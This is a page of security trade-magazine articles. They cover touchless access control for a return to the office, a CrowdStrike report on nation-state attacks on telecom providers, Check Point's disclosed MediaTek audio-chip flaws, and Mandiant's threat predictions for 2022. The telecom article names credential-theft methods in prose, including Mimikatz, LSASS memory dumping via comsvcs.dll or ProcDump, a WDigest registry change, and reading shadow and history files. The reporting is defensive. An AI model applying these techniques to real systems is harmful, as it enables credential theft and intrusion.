Connect with us

Expert Speak

How Access Control Plays a Vital Role in a Safe and Secure Return-to-Work Strategy



Written by Sanjit Bardhan, Vice President – Head of Emerging Markets, Physical Access Control Solutions at HID Global

Employers today face a new challenge: to provide a safe and clean work environment as employees bring with them a new social consciousness centered on public health awareness, social distancing, and hygienic spaces. As employees consider a return to the physical workplace, they must adapt to new requirements, implement new procedures, and leverage technology to alleviate their employees’ concerns.

Access control plays a critical role in creating a safe back-to-work strategy. Organizations can leverage contactless physical access technologies — including mobile credentials along with Bluetooth solutions — as well as implement location services and visitor management tools to provide employees with an experience that supports a healthy and safe work environment.

As organizations move toward reopening their offices, workers bring with them a new awareness of issues around human proximity, environmental and surface cleanliness, and the sharing of publicly accessed resources such as touch screens and keypads. Hygiene isn’t a new concern, but the level of awareness is new, as well as the need to give employees the confidence that their workplace is not only secure but healthy and safe.
Physical access is a prime area of interest.

Crowded entryways, elevators and shared working spaces are a threat to safe social distancing. Credentialing processes that come with high human-to-human contact are also a cause for concern. Those who manage physical access can play a key role in helping to meet these changed expectations.

With health and safety concerns at the forefront, security and facilities personnel have the opportunity to be the heroes of the day. At a time when employee safety is not just an ordinary need, but an extraordinary moral obligation, teams can rise to the fore with proactive solutions that meaningfully impact the quality of life.

Access control management can help route employees, in tandem with efforts to stagger work times. Physical access control systems (PACS) can also leverage location services to support contact tracing and reduce crowding, and these same systems can be used in support of thoughtful visitor management.

While contactless credentials inherently support a touchless “badging in” experience, employers and building managers should implement these technologies as part of a holistic approach to building management. Clear policies, explicit signage, cleanliness protocols — all are part of this big picture.

Those looking to support a safe return to the workplace can look to technology to help minimize the high-touch human interactions that have characterized PACS in the past. By upgrading from legacy systems to more modernized solutions, it is possible to significantly reduce human contact around access control in a way that directly addresses employee concerns.

Various forms of touchless access control can help to reduce viral spread at human-to-object touchpoints. By reducing contact between humans and the objects related to access control, security could help to minimize potential cross-contamination. Automatic door operators, revolving doors, and sliding doors — all can help to reduce contact at high-volume entry and exit points. These can be coupled with contactless credentials and readers to ensure security while minimizing surface contamination.

Another strategy involves the use of long-range capable readers that leverage Bluetooth Low Energy (BLE) connections to deliver read performance at a distance. With a read range of up to several meters, BLE can further distance employees who might otherwise crowd up around readers and doors. Mobile access likewise reduces the need for employees to physically touch cards and communal readers.

Organizations that rely on keypads or two-factor authentication may find mobile credentials and mobile capable readers to be a more hygienic alternative. The user is required to unlock their phone using a passcode, fingerprint, or facial read in order for the phone to unlock, thus delivering two-factor security without the need to touch a shared keypad.

In the same way, mobile also allows for a biometric layer to be added to the access experience. Businesses can configure the mobile credential to only work when the device is unlocked, thereby requiring the owner to authenticate using their enrolled biometric, whether fingerprint or facial recognition. That mitigates the risk of a lost, stolen, or shared mobile device from being used.

And by leveraging the technology on the mobile device instead of at the door, users are only touching their own device and not a touchpoint that is shared with every other occupant. Touchless credentials, including mobile-based, shouldn’t be limited to opening doors. Organizations also may find that these credentials support more hygienic protocols for logging in to networks, paying for vending, or activating printing. In order to reduce contact at shared surfaces, these technologies need to be implemented in tandem with clear policies and supporting signage.

Most credentialing processes rely on a high degree of human-to-human interaction: someone in IT or the card office prepares the card, the card may then be passed to HR or the front desk for delivery to the user. And when a card is lost or stolen, the process repeats. Whether it is an employee or a visitor, the credentialing process is typically a high-touch operation.

Over-the-air provisioning minimizes contact for those seeking credentials, and it can have a dramatic impact on the human-to-human contact for the administrator charged with assigning credentials. Fewer visits from those looking to obtain credentials significantly reduce the risk factor for those that normally see a range of personnel on a daily basis.

Visitors introduce a new variable to the equation. They must be credentialed upon entry, and their untracked movements can pose a health risk, or at least introduce a dangerous unknown should contact tracing become necessary. Solid policies and advanced technologies can ensure the safe movement of visitors. Visitor management solutions can be used either standalone or in conjunction with an organization’s access control system. Visitors self-register in the lobby and hosts are notified when they arrive.

Driver’s license scanners, barcode scanners, cameras, and printers all help support those front desk processes.
While the primary use case is for visitors, these systems can also be used to issue employees temporary badges for single-day use or to issue replacement badges.

Visitor management solutions are also ideal for a range of high-volume settings, including healthcare, schools, and logistics — all places where physical access control is critical and visitors are frequent. Even more, records from the visitor management system can be used for follow-up tracking of potential contacts in case an employee or visitor receives a positive virus test result.

The key to keeping people physically distanced is knowing where they are at any given time. Much how GPS is used in outdoor settings, location services leverage BLE beacons to ping off gateways that in turn can identify the location of individuals in a physical space. An individual’s identity can be based on an ID card which broadcasts continually, creating a virtual map of location relative to the fixed gateways.

Location services give management a means to be proactive rather than reactive in their efforts to promote physical distancing. The same system could make space utilization more efficient. Connected beacons could broadcast room occupancy, for example, letting people know which spaces are free and which are in use. In the same way, this connectivity could serve as an early-warning system.

There’s also significant forensic value in this capability. Should an individual test positive for COVID, the arduous task of contact tracing — identifying people who have an infectious disease and those they’ve come in contact with — is automated. “Rather than relying on a person’s memory, you can trace a person — or anything tagged with a beacon – and build historical data on where that person had been and who else had been there, with graphics and analysis,” said Blokker.

In addition, location services support “mustering” — the ability to call together a select group of employees in an urgent circumstance. Location services can also support monitoring usage of hand sanitizing stations. By embedding a BLE sensor in the soap or sanitizer dispenser, the user’s beacon authenticates and registers the event. With hand hygiene being a key way to prevent the spread of infection, enforcing consistent usage is vital to a healthy workplace.

For those charged with implementing and overseeing physical access control, these are extraordinarily challenging times. While technology can play a significant role in supporting social distancing and other pandemic-related needs, policies are at the core of any successful return-to-work effort.

It is critical, for example, to have solid audit systems in place. PACS systems generate logs, reports, and archives — invaluable information if put to good use. Building managers can leverage this key data to see who was in the facility and when in order to build a fuller picture of the operational risks.

Cyber Security

Telecom Sector: Cyber Attack Target Number One for Nation-State Actors



Written by Roland Daccache, Systems Engineer Manager MEA, CrowdStrike

Telecommunications providers play a unique and crucial role in modern societies. Businesses, governments, and individuals rely on the smooth functioning of communications. However, it is precisely this centrality and ubiquitous presence of telecommunications systems that also make them valuable targets for governments and criminals worldwide.

Targeting the telecommunications sector is becoming more and more popular
The latest Overwatch Report from CrowdStrike shows that attacks on the telecommunications industry have more than doubled in the last 12 months. Overall, 40 percent of all targeted attack attempts detected by OverWatch experts were directed at this industry. Especially for nation-state actors, this target industry is very attractive, because targeted attacks can be used to realise their own surveillance, intelligence, and counterintelligence missions. It comes as no surprise that the telecommunications industry tops the list of the top 5 industry targets among nation-state actors.

Most attacks on telecom companies come from groups close to China. However, actors with an Iranian background have also been spotted attacking the telecom sector. The operations against telecommunication providers illustrate that the protection of sensitive data and critical infrastructure is becoming increasingly important. One more reason to take a close look at the constantly changing threat landscape and its actors is to find effective methods against their tools, techniques, and procedures (TTPs).

Attacks on the telecommunications industry – The typical TTPs
To gain initial access to their victim networks, communications sector attackers use a variety of techniques. Among the most common is spear phishing, exploiting vulnerabilities, compromising the supply chain, and misusing legitimate credentials.

Once the first step is taken, the attackers use native tools such as Windows Management Instrumentation or even various command and script interpreters such as Powershell to carry out their mission. To avoid detection and be able to carry out the attack without interference, the perpetrators keep looking for new hosts that offer the possibility to collect credentials to continue moving laterally through the target environment unnoticed.

To grab the desired credentials in Microsoft environments, attackers often use Mimikatz, read LSASS memory (often via comsvcs.dll or using ProcDump), or modify the WDigest registry key to store passwords in plain text.

In Linux environments, attackers often look at the contents of sensitive files, such as .bash_history, passwd, shadow, and other configuration files and administrative scripts when trying to discover credentials. OverWatch has also observed attackers using newer techniques. For example, in one case, an attacker deployed SSH daemons via a backdoor that was capable of logging credentials.

Cyber attackers also often use web-based login pages. They are modified in such a way that the login information can also be stored for later retrieval. Thus, hackers are no longer under time pressure for their initial access. So-called web shells also make it possible to manage multiple victim networks via a single interface. This leads to the very real danger of multiple attacks being launched simultaneously by one hacker group.

This is because the effort required to carry out operations is thus considerably reduced for the attackers. In addition, web shells can be used because of their simplicity and cross-platform compatibility or in different web server environments. With all these tools, actors manage to know when, how, and where call details and SMS messages are forwarded and recorded in order to strike.

Collateral damage from hacker attacks
To disguise their true goals and intentions, attackers often carry out very large-scale data exfiltrations. In reality, however, they are often only interested in specific information from very few people. The damage caused is therefore often immense. It is therefore all the more important to identify and stop the attackers. However, this undertaking is often more difficult than expected, because criminals often have extensive knowledge of a target network and are therefore difficult to distinguish from legitimate administrators.

A comprehensive cyber defence that also detects and successfully defends against these activities is therefore indispensable, especially for critical infrastructures. To successfully counter the tactics and techniques of modern attackers, it is advisable to rely not only on the latest technologies but also on human know-how and active threat hunting.  These specialists tirelessly search for novel and anomalous tactics, techniques and procedures (TTPs) of attackers that remain undetected by technical detection measures and stop them as soon as they are identified.

Continue Reading

Expert Speak

Security Flaws in Smartphone Chip Could Have Led Hackers to Eavesdrop on Android Users



Check Point Research (CPR) identified security flaws in the smartphone chip made by Taiwanese manufacturer MediaTek. Found in 37% of the world’s smartphones, MediaTek’s chip serves as the main processor for nearly every notable Android device, including Xiaomi, Oppo, Realme, Vivo, and more. The security flaws were found inside the chip’s audio processer. Left unpatched, the vulnerabilities could have enabled a hacker to eavesdrop on an Android user and/or hide malicious code.

MediaTek chips contain a special AI processing unit (APU) and audio Digital signal processor (DSP) to improve media performance and reduce CPU usage. Both the APU and the audio DSP have custom microprocessor architectures, making MediaTek DSP a unique and challenging target for security research. CPR grew curious around the degree to which MediaTek DSP could be used as an attack vector for threat actors. For the first time, CPR was able to reverse engineer the MediaTek audio processor, revealing several security flaws.

Attack Methodology
To exploit the security vulnerabilities, a threat actor’s order of operations, in theory, would be:

  • A user installs a malicious app from the Play Store and launches it
  • The app uses the MediaTek API to attack a library that has permissions to talk with the audio driver
  • The app with system privilege sends crafted messages to the audio driver to execute code in the firmware of the audio processor
  • The app steals the audio flow

Responsible Disclosure
CPR responsibly disclosed its findings to MediaTek, creating the following: CVE-2021-0661, CVE-2021-0662, CVE-2021-0663. These three vulnerabilities were subsequently fixed and published in the October 2021 MediaTek Security Bulletin. The security issue in the MediaTek audio HAL (CVE-2021-0673) was fixed in October and will be published in the December 2021 MediaTek Security Bulletin. CPR also informed Xiaomi of its findings.

Slava Makkaveev, Security Researcher at Check Point Software, said, “MediaTek is known to be the most popular chip for mobile devices. Given its ubiquity in the world, we began to suspect that it could be used as an attack vector by potential hackers. We embarked on research into the technology, which led to the discovery of a chain of vulnerabilities that potentially could be used to reach and attack the audio processor of the chip from an Android application. Left unpatched, a hacker potentially could have exploited the vulnerabilities to listen in on conversations of Android users. Furthermore, the security flaws could have been misused by the device manufacturers themselves to create a massive eavesdrop campaign. Although we do not see any specific evidence of such misuse, we moved quickly to disclose our findings to MediaTek and Xiaomi. In summary, we proved out a completely new attack vector that could have abused the Android API. Our message to the Android community is to update their devices to the latest security patch in order to be protected. MediaTek worked diligently with us to ensure these security issues were fixed in a timely manner, and we are grateful for their cooperation and spirit for a more secure world.”

Tiger Hsu, Product Security Officer at MediaTek said “Device security is a critical component and priority of all MediaTek platforms. Regarding the Audio DSP vulnerability disclosed by Check Point Software, we worked diligently to validate the issue and make appropriate mitigations available to all OEMs. We have no evidence it is currently being exploited. We encourage end-users to update their devices as patches become available and to only install applications from trusted locations such as the Google Play Store. We appreciate the collaboration with the Check Point research team to make the MediaTek product ecosystem more secure.”

Continue Reading

Cyber Security

Mandiant Shares Cybersecurity Predictions for 2022



Mandiant has released its predictions report – 14 Cyber Security Predictions for 2022 and Beyond.
“The only constant in our industry is the uncertainty in the cyber realm. Attackers keep evolving – getting more sophisticated and changing their tactics, techniques and procedures to try get one up on the defenders,” said Gordon Love, VP MEA at Mandiant. “This report provides security leaders with an overview of what to expect in 2022 and beyond, based on the trends we see now. Organisations have a lot to keep in mind for next year, but remaining vigilant will enable them to defend against upcoming threats—and respond to those that inevitably get through.”

The top cyber security threats identified in the report include:

No end in sight for Ransomware
The ransomware threat has grown significantly throughout the past decade, and it will continue its upward trend. The business of ransomware is simply too lucrative unless international governments and technology innovations can fundamentally alter the attacker cost-benefit calculation.

Threat actors engaged in multifaceted extortion will continue to find more ways to extort payments from their victims. In 2022 Mandiant expects to see actors ramp up new tactics, such as trying to recruit insiders within their victims or targets. More cybercriminals are expected to evolve as threat actors become more business savvy and learn what kind of situations their victims most want to avoid.

Focus on Operation Technology (OT)
Throughout 2021, Mandiant observed low sophistication threat actors learn that they could create big impacts in the OT space—perhaps even bigger than intended. Actors will continue to explore the OT space in 2022 and increasingly use ransomware in their attacks.

Attacks against critical OT environments can cause severe disruption and even threaten human lives, thereby increasing the pressure for organizations to pay a ransom. To compound the issue, many of these OT devices are not built with security at the forefront of the design, and there is a massive uptick in the number of vulnerabilities being identified in OT environments.

Iran to continue their aggressive stance
Iran will use its cyber tools in a much more aggressive manner to promote regional interests. Iran will also continue to target Israel and others in the Middle East. They’ve shown their capability and willingness to use destructive malware, so they are expected to take advantage of any presented opportunities. Ultimately, Iran will try to create more of a power balance shifted to its own interests. Mandiant has seen them targeting abroad, but their targeting will most likely be regional throughout 2022.

Afghanistan events may trigger espionage
With the assertion of Taliban control and departure of U.S. forces from Afghanistan, one can expect further cyber espionage and information operations. The usual information operations actors—Iran, China, Russia—are expected to push narratives to support their interests through the end of 2021 and into 2022. They’ll also play up negative perceptions around the events, notably the perception that the U.S. failed to live up to its commitments to organizations and countries.

Cloud and third parties introduce new chokepoints
Organizations will continue to increasingly rely on the cloud and cloud-hosted third-party providers for primary business tasks, putting more pressure on those third parties to maintain both availability and security. The proportion of Mandiant incident response investigations involving cloud resources has grown over the past several years, and they anticipate that cloud compromise and abuse will continue to grow in tandem with enterprise cloud adoption throughout 2022.

More internet of things (IoT) devices, more vulnerabilities, more attack surface
As the number of IoT devices grow, so will the number of vulnerabilities for bug hunters to track. These devices are connected, and the general attack surface expands with the potential for profound impact. Unfortunately, there hasn’t been enough emphasis on security in fundamental IoT device design to fix these issues, so the situation will only get worse in the years to come.

As we move into 2022, CISOs have a lot on their mind and remaining vigilant will enable them to defend against upcoming threats—and respond to those that inevitably get through.

Continue Reading

Follow Us


Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.